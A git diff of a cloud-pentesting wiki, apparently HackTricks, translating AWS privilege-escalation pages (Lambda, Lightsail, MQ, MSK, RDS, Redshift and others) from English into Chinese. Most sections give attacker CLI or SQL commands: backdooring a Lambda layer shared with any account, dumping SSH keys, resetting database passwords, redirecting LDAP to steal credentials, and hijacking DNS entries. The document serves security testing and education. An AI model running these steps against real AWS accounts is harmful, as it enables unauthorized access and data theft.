this).\ -Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:** - +然后,将 `./lambda_layer` 目录压缩并 **在您自己的账户中上传新的 lambda 层**(或在受害者的账户中,但您可能没有权限这样做)。\ +请注意,您需要创建一个 python 文件夹并将库放在其中以覆盖 /opt/python/boto3。此外,层需要与 lambda 使用的 **python 版本兼容**,如果您将其上传到您的账户,它需要位于 **同一区域:** ```bash aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" ``` - -Now, make the uploaded lambda layer **accessible by any account**: - +现在,使上传的 lambda 层 **对任何账户可访问**: ```bash aws lambda add-layer-version-permission --layer-name boto3 \ - --version-number 1 --statement-id public \ - --action lambda:GetLayerVersion --principal * +--version-number 1 --statement-id public \ +--action lambda:GetLayerVersion --principal * ``` - -And attach the lambda layer to the victim lambda function: - +并将 lambda 层附加到受害者 lambda 函数: ```bash aws lambda update-function-configuration \ - --function-name \ - --layers arn:aws:lambda:::layer:boto3:1 \ - --timeout 300 #5min for rev shells +--function-name \ +--layers arn:aws:lambda:::layer:boto3:1 \ +--timeout 300 #5min for rev shells ``` +下一步要么是**自己调用函数**,如果可以的话,要么是等待**它被正常方式调用**——这是更安全的方法。 -The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method. - -A **more stealth way to exploit this vulnerability** can be found in: +**利用此漏洞的更隐蔽方式**可以在以下内容中找到: {{#ref}} ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md {{#endref}} -**Potential Impact:** Direct privesc to the lambda service role used. +**潜在影响:** 直接提升到使用的lambda服务角色。 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl` -Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do! +也许拥有这些权限你能够创建一个函数并通过调用URL执行它……但我找不到测试的方法,所以如果你找到,请告诉我! ### Lambda MitM -Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in: +一些lambda将会**接收用户在参数中发送的敏感信息。** 如果在其中一个中获得RCE,你可以提取其他用户发送给它的信息,查看: {{#ref}} ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md {{#endref}} -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md index 1bf78eb3c..6a2488865 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md @@ -4,112 +4,93 @@ ## Lightsail -For more information about Lightsail check: +有关 Lightsail 的更多信息,请查看: {{#ref}} ../aws-services/aws-lightsail-enum.md {{#endref}} > [!WARNING] -> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. +> 重要的是要注意,Lightsail **不使用属于用户的 IAM 角色**,而是使用 AWS 管理的账户,因此您无法利用此服务进行特权提升。然而,**敏感数据**如代码、API 密钥和数据库信息可能会在此服务中找到。 ### `lightsail:DownloadDefaultKeyPair` -This permission will allow you to get the SSH keys to access the instances: - +此权限将允许您获取访问实例的 SSH 密钥: ``` aws lightsail download-default-key-pair ``` - -**Potential Impact:** Find sensitive info inside the instances. +**潜在影响:** 在实例中查找敏感信息。 ### `lightsail:GetInstanceAccessDetails` -This permission will allow you to generate SSH keys to access the instances: - +此权限将允许您生成 SSH 密钥以访问实例: ```bash aws lightsail get-instance-access-details --instance-name ``` - -**Potential Impact:** Find sensitive info inside the instances. +**潜在影响:** 在实例中查找敏感信息。 ### `lightsail:CreateBucketAccessKey` -This permission will allow you to get a key to access the bucket: - +此权限将允许您获取访问存储桶的密钥: ```bash aws lightsail create-bucket-access-key --bucket-name ``` - -**Potential Impact:** Find sensitive info inside the bucket. +**潜在影响:** 在存储桶中查找敏感信息。 ### `lightsail:GetRelationalDatabaseMasterUserPassword` -This permission will allow you to get the credentials to access the database: - +此权限将允许您获取访问数据库的凭据: ```bash aws lightsail get-relational-database-master-user-password --relational-database-name ``` - -**Potential Impact:** Find sensitive info inside the database. +**潜在影响:** 在数据库中找到敏感信息。 ### `lightsail:UpdateRelationalDatabase` -This permission will allow you to change the password to access the database: - +此权限将允许您更改访问数据库的密码: ```bash aws lightsail update-relational-database --relational-database-name --master-user-password ``` - -If the database isn't public, you could also make it public with this permissions with - +如果数据库不是公开的,您也可以通过这些权限将其公开。 ```bash aws lightsail update-relational-database --relational-database-name --publicly-accessible ``` - -**Potential Impact:** Find sensitive info inside the database. +**潜在影响:** 在数据库中查找敏感信息。 ### `lightsail:OpenInstancePublicPorts` -This permission allow to open ports to the Internet - +此权限允许将端口开放到互联网。 ```bash aws lightsail open-instance-public-ports \ - --instance-name MEAN-2 \ - --port-info fromPort=22,protocol=TCP,toPort=22 +--instance-name MEAN-2 \ +--port-info fromPort=22,protocol=TCP,toPort=22 ``` - -**Potential Impact:** Access sensitive ports. +**潜在影响:** 访问敏感端口。 ### `lightsail:PutInstancePublicPorts` -This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it. - +此权限允许将端口开放到互联网。请注意,此调用将关闭未在其上指定的任何已打开端口。 ```bash aws lightsail put-instance-public-ports \ - --instance-name MEAN-2 \ - --port-infos fromPort=22,protocol=TCP,toPort=22 +--instance-name MEAN-2 \ +--port-infos fromPort=22,protocol=TCP,toPort=22 ``` - -**Potential Impact:** Access sensitive ports. +**潜在影响:** 访问敏感端口。 ### `lightsail:SetResourceAccessForBucket` -This permissions allows to give an instances access to a bucket without any extra credentials - +此权限允许实例在没有任何额外凭据的情况下访问存储桶。 ```bash aws set-resource-access-for-bucket \ - --resource-name \ - --bucket-name \ - --access allow +--resource-name \ +--bucket-name \ +--access allow ``` - -**Potential Impact:** Potential new access to buckets with sensitive information. +**潜在影响:** 可能新获得对包含敏感信息的存储桶的访问权限。 ### `lightsail:UpdateBucket` -With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone: - +通过此权限,攻击者可以授予自己的 AWS 账户对存储桶的读取访问权限,甚至可以将存储桶公开给所有人: ```bash # Grant read access to exterenal account aws update-bucket --bucket-name --readonly-access-accounts @@ -120,47 +101,36 @@ aws update-bucket --bucket-name --access-rules getObject=public,allowPub # Bucket private but single objects can be public aws update-bucket --bucket-name --access-rules getObject=private,allowPublicOverrides=true ``` - -**Potential Impact:** Potential new access to buckets with sensitive information. +**潜在影响:** 可能新获得对包含敏感信息的存储桶的访问。 ### `lightsail:UpdateContainerService` -With this permissions an attacker could grant access to private ECRs from the containers service - +通过此权限,攻击者可以授予对容器服务的私有 ECR 的访问权限。 ```bash aws update-container-service \ - --service-name \ - --private-registry-access ecrImagePullerRole={isActive=boolean} +--service-name \ +--private-registry-access ecrImagePullerRole={isActive=boolean} ``` - -**Potential Impact:** Get sensitive information from private ECR +**潜在影响:** 从私有 ECR 获取敏感信息 ### `lightsail:CreateDomainEntry` -An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. - +拥有此权限的攻击者可以创建子域并将其指向自己的 IP 地址(子域接管),或制作一个 SPF 记录,使其能够伪造来自该域的电子邮件,甚至将主域设置为自己的 IP 地址。 ```bash aws lightsail create-domain-entry \ - --domain-name example.com \ - --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +--domain-name example.com \ +--domain-entry name=dev.example.com,type=A,target=192.0.2.0 ``` - -**Potential Impact:** Takeover a domain +**潜在影响:** 接管一个域名 ### `lightsail:UpdateDomainEntry` -An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. - +拥有此权限的攻击者可以创建子域并将其指向自己的IP地址(子域接管),或制作一个SPF记录,使其能够伪造来自该域名的电子邮件,甚至将主域名设置为自己的IP地址。 ```bash aws lightsail update-domain-entry \ - --domain-name example.com \ - --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +--domain-name example.com \ +--domain-entry name=dev.example.com,type=A,target=192.0.2.0 ``` - -**Potential Impact:** Takeover a domain +**潜在影响:** 接管一个域名 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md index a1004bde6..d3d6bf545 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md @@ -4,26 +4,18 @@ ### `mediapackage:RotateChannelCredentials` -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - +更改频道的第一个 IngestEndpoint 的用户名和密码。 (此 API 已被 RotateIngestEndpointCredentials 替代) ```bash aws mediapackage rotate-channel-credentials --id ``` - ### `mediapackage:RotateIngestEndpointCredentials` -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - +更改频道的第一个 IngestEndpoint 的用户名和密码。 (此 API 已弃用,用于 RotateIngestEndpointCredentials) ```bash aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 ``` - -## References +## 参考 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md index 80890e389..e8c35abb4 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md @@ -4,7 +4,7 @@ ## MQ -For more information about MQ check: +有关MQ的更多信息,请查看: {{#ref}} ../aws-services/aws-mq-enum.md @@ -12,42 +12,32 @@ For more information about MQ check: ### `mq:ListBrokers`, `mq:CreateUser` -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - +拥有这些权限,您可以**在ActimeMQ代理中创建新用户**(这在RabbitMQ中无效): ```bash aws mq list-brokers aws mq create-user --broker-id --console-access --password --username ``` - -**Potential Impact:** Access sensitive info navigating through ActiveMQ +**潜在影响:** 通过 ActiveMQ 访问敏感信息 ### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - +拥有这些权限后,您可以 **在 ActiveMQ 代理中创建新用户**(这在 RabbitMQ 中无效): ```bash aws mq list-brokers aws mq list-users --broker-id aws mq update-user --broker-id --console-access --password --username ``` - -**Potential Impact:** Access sensitive info navigating through ActiveMQ +**潜在影响:** 通过 ActiveMQ 访问敏感信息 ### `mq:ListBrokers`, `mq:UpdateBroker` -If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. - +如果一个代理使用 **LDAP** 进行授权与 **ActiveMQ**。攻击者可以 **更改** 用于 **的 LDAP 服务器的配置** 为 **一个由攻击者控制的**。这样攻击者将能够 **窃取所有通过 LDAP 发送的凭据**。 ```bash aws mq list-brokers aws mq update-broker --broker-id --ldap-server-metadata=... ``` +如果你能以某种方式找到 ActiveMQ 使用的原始凭据,你可以执行 MitM,窃取凭据,在原始服务器中使用它们,并发送响应(也许只是重用被窃取的凭据你就可以做到这一点)。 -If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). - -**Potential Impact:** Steal ActiveMQ credentials +**潜在影响:** 窃取 ActiveMQ 凭据 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md index f0538785f..82bc38bf6 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md @@ -4,7 +4,7 @@ ## MSK -For more information about MSK (Kafka) check: +有关 MSK (Kafka) 的更多信息,请查看: {{#ref}} ../aws-services/aws-msk-enum.md @@ -12,17 +12,11 @@ For more information about MSK (Kafka) check: ### `msk:ListClusters`, `msk:UpdateSecurity` -With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. - +拥有这些 **权限** 和 **对 kafka 代理所在 VPC 的访问**,您可以添加 **无身份验证** 以访问它们。 ```bash aws msk --client-authentication --cluster-arn --current-version ``` - -You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ -If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. +您需要访问 VPC,因为 **您无法启用公开暴露的 Kafka 的 None 认证**。如果它是公开暴露的,如果使用 **SASL/SCRAM** 认证,您可以 **读取秘密** 以访问(您将需要额外的权限来读取秘密)。\ +如果使用 **基于 IAM 角色的认证** 并且 **Kafka 是公开暴露的**,您仍然可以滥用这些权限以获得访问权限。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md index 7d43bbd3b..9e0bcff55 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md @@ -4,19 +4,15 @@ ## Organizations -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-organizations-enum.md {{#endref}} -## From management Account to children accounts +## 从管理账户到子账户 -If you compromise the root/management account, chances are you can compromise all the children accounts.\ -To [**learn how check this page**](../#compromising-the-organization). +如果您妥协了根/管理账户,您很可能会妥协所有子账户。\ +要[**了解如何,请查看此页面**](../#compromising-the-organization)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md index b4a08093e..61c1a603b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md @@ -2,9 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -## RDS - Relational Database Service +## RDS - 关系数据库服务 -For more information about RDS check: +有关 RDS 的更多信息,请查看: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md @@ -12,59 +12,54 @@ For more information about RDS check: ### `rds:ModifyDBInstance` -With that permission an attacker can **modify the password of the master user**, and the login inside the database: - +拥有该权限的攻击者可以 **修改主用户的密码**,以及数据库中的登录: ```bash # Get the DB username, db name and address aws rds describe-db-instances # Modify the password and wait a couple of minutes aws rds modify-db-instance \ - --db-instance-identifier \ - --master-user-password 'Llaody2f6.123' \ - --apply-immediately +--db-instance-identifier \ +--master-user-password 'Llaody2f6.123' \ +--apply-immediately # In case of postgres psql postgresql://:@:5432/ ``` - > [!WARNING] -> You will need to be able to **contact to the database** (they are usually only accessible from inside networks). +> 您需要能够**联系数据库**(它们通常仅在内部网络中可访问)。 -**Potential Impact:** Find sensitive info inside the databases. +**潜在影响:** 在数据库中查找敏感信息。 ### rds-db:connect -According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance. +根据[**文档**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html),具有此权限的用户可以连接到DB实例。 -### Abuse RDS Role IAM permissions +### 滥用RDS角色IAM权限 #### Postgresql (Aurora) > [!TIP] -> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. - -First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions: +> 如果运行**`SELECT datname FROM pg_database;`**时发现名为**`rdsadmin`**的数据库,您就知道您在一个**AWS postgresql数据库**中。 +首先,您可以检查此数据库是否已用于访问任何其他AWS服务。您可以通过查看已安装的扩展来检查这一点: ```sql SELECT * FROM pg_extension; ``` +如果你发现类似 **`aws_s3`** 的东西,你可以假设这个数据库对 S3 **有某种访问权限**(还有其他扩展名,如 **`aws_ml`** 和 **`aws_lambda`**)。 -If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**). - -Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has. - -Now, to **read a file inside a bucket** you need to know the full path. You can read it with: +此外,如果你有权限运行 **`aws rds describe-db-clusters`**,你可以在 **`AssociatedRoles`** 字段中查看 **集群是否附加了任何 IAM 角色**。如果有,你可以假设该数据库是 **为访问其他 AWS 服务而准备的**。根据 **角色的名称**(或者如果你能获取 **角色的权限**),你可以 **猜测** 数据库具有的额外访问权限。 +现在,要 **读取存储桶中的文件**,你需要知道完整路径。你可以用以下命令读取它: ```sql // Create table CREATE TABLE ttemp (col TEXT); // Create s3 uri SELECT aws_commons.create_s3_uri( - 'test1234567890678', // Name of the bucket - 'data.csv', // Name of the file - 'eu-west-1' //region of the bucket +'test1234567890678', // Name of the bucket +'data.csv', // Name of the file +'eu-west-1' //region of the bucket ) AS s3_uri \gset // Load file contents in table @@ -76,98 +71,81 @@ SELECT * from ttemp; // Delete table DROP TABLE ttemp; ``` - -If you had **raw AWS credentials** you could also use them to access S3 data with: - +如果你拥有 **原始 AWS 凭证**,你也可以使用它们访问 S3 数据,方法是: ```sql SELECT aws_s3.table_import_from_s3( - 't', '', '(format csv)', - :'s3_uri', - aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') +'t', '', '(format csv)', +:'s3_uri', +aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') ); ``` - > [!NOTE] -> Postgresql **doesn't need to change any parameter group variable** to be able to access S3. +> Postgresql **不需要更改任何参数组变量** 就可以访问 S3。 #### Mysql (Aurora) > [!TIP] -> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. +> 在 mysql 中,如果你运行查询 **`SELECT User, Host FROM mysql.user;`** 并且有一个用户叫 **`rdsadmin`**,你可以假设你在一个 **AWS RDS mysql 数据库** 中。 -Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data. +在 mysql 中运行 **`show variables;`**,如果变量如 **`aws_default_s3_role`**、**`aurora_load_from_s3_role`**、**`aurora_select_into_s3_role`** 有值,你可以假设数据库已准备好访问 S3 数据。 -Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services). - -Now, to **read a file inside a bucket** you need to know the full path. You can read it with: +此外,如果你有权限运行 **`aws rds describe-db-clusters`**,你可以检查集群是否有任何 **关联角色**,这通常意味着可以访问 AWS 服务。 +现在,要 **读取存储桶中的文件**,你需要知道完整路径。你可以用以下命令读取它: ```sql CREATE TABLE ttemp (col TEXT); LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col); SELECT * FROM ttemp; DROP TABLE ttemp; ``` - ### `rds:AddRoleToDBCluster`, `iam:PassRole` -An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. - +拥有权限 `rds:AddRoleToDBCluster` 和 `iam:PassRole` 的攻击者可以 **将指定角色添加到现有的 RDS 实例**。这可能允许攻击者 **访问敏感数据** 或修改实例中的数据。 ```bash aws add-role-to-db-cluster --db-cluster-identifier --role-arn ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\ -Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also. +**潜在影响**:访问敏感数据或对RDS实例中的数据进行未经授权的修改。\ +请注意,一些数据库需要额外的配置,例如Mysql,需要在参数组中指定角色ARN。 ### `rds:CreateDBInstance` -Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet: - +仅凭此权限,攻击者可以在已经存在并附加了**IAM角色**的集群中创建一个**新实例**。他将无法更改主用户密码,但他可能能够将新数据库实例暴露于互联网: ```bash aws --region eu-west-1 --profile none-priv rds create-db-instance \ - --db-instance-identifier mydbinstance2 \ - --db-instance-class db.t3.medium \ - --engine aurora-postgresql \ - --db-cluster-identifier database-1 \ - --db-security-groups "string" \ - --publicly-accessible +--db-instance-identifier mydbinstance2 \ +--db-instance-class db.t3.medium \ +--engine aurora-postgresql \ +--db-cluster-identifier database-1 \ +--db-security-groups "string" \ +--publicly-accessible ``` - ### `rds:CreateDBInstance`, `iam:PassRole` > [!NOTE] -> TODO: Test +> TODO: 测试 -An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance. +拥有权限 `rds:CreateDBInstance` 和 `iam:PassRole` 的攻击者可以 **创建一个附加指定角色的新 RDS 实例**。攻击者随后可能 **访问敏感数据** 或修改实例中的数据。 > [!WARNING] -> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): - -> - The profile must exist in your account. -> - The profile must have an IAM role that Amazon EC2 has permissions to assume. -> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . +> 附加角色/实例配置文件的一些要求(来自 [**这里**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): +> - 配置文件必须在您的账户中存在。 +> - 配置文件必须有一个 IAM 角色,Amazon EC2 有权限假设。 +> - 实例配置文件名称和关联的 IAM 角色名称必须以前缀 `AWSRDSCustom` 开头。 ```bash aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. +**潜在影响**:访问敏感数据或对RDS实例中的数据进行未经授权的修改。 ### `rds:AddRoleToDBInstance`, `iam:PassRole` -An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. +拥有权限 `rds:AddRoleToDBInstance` 和 `iam:PassRole` 的攻击者可以**将指定角色添加到现有的RDS实例**。这可能允许攻击者**访问敏感数据**或修改实例中的数据。 > [!WARNING] -> The DB instance must be outside of a cluster for this - +> DB实例必须位于集群之外才能实现此操作。 ```bash aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. +**潜在影响**:访问敏感数据或对RDS实例中的数据进行未经授权的修改。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md index 825c16ad6..a30998679 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md @@ -4,7 +4,7 @@ ## Redshift -For more information about RDS check: +有关 RDS 的更多信息,请查看: {{#ref}} ../aws-services/aws-redshift-enum.md @@ -12,52 +12,45 @@ For more information about RDS check: ### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - +拥有这些权限后,您可以获取 **所有集群的信息**(包括名称和集群用户名)并 **获取凭据** 以访问它: ```bash # Get creds aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 # Connect, even if the password is a base64 string, that is the password psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 ``` - -**Potential Impact:** Find sensitive info inside the databases. +**潜在影响:** 在数据库中查找敏感信息。 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - +拥有这些权限后,您可以获取**所有集群的信息**并**获取访问凭证**。\ +请注意,postgres 用户将拥有**用于获取凭证的 IAM 身份**所具有的权限。 ```bash # Get creds aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 # Connect, even if the password is a base64 string, that is the password psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 ``` - -**Potential Impact:** Find sensitive info inside the databases. +**潜在影响:** 在数据库中查找敏感信息。 ### `redshift:DescribeClusters`, `redshift:ModifyCluster?` -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - +可以通过 aws cli **修改内部 postgres (redshit) 用户的主密码**(我认为这是你需要的权限,但我还没有测试过): ``` aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; ``` +**潜在影响:** 在数据库中查找敏感信息。 -**Potential Impact:** Find sensitive info inside the databases. - -## Accessing External Services +## 访问外部服务 > [!WARNING] -> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. +> 要访问以下所有资源,您需要**指定要使用的角色**。一个 Redshift 集群**可以分配一系列 AWS 角色**,如果您知道 ARN,您可以使用这些角色,或者您可以设置“**default**”以使用分配的默认角色。 -> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` +> 此外,正如[**这里解释的**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html),Redshift 还允许连接角色(只要第一个角色可以假设第二个角色)以获得进一步的访问,但只需用**逗号**分隔它们:`iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` ### Lambdas -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - +正如在[https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html)中解释的那样,可以使用类似以下内容的方式**从 Redshift 调用 Lambda 函数**: ```sql CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) RETURNS INT @@ -65,11 +58,9 @@ STABLE LAMBDA 'lambda_function' IAM_ROLE default; ``` - ### S3 -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - +正如在 [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html) 中所解释的,可以**读取和写入 S3 存储桶**: ```sql # Read copy table from 's3:///load/key_prefix' @@ -82,30 +73,23 @@ unload ('select * from venue') to 's3://mybucket/tickit/unload/venue_' iam_role default; ``` - ### Dynamo -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - 